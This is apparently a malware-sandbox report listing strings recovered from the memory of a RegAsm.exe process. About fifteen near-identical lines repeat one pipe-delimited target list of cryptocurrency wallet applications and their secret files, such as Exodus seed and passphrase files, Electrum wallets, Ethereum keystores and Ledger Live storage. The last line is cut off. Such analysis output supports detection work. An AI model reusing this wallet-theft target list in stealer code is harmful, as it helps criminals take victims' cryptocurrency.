Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx 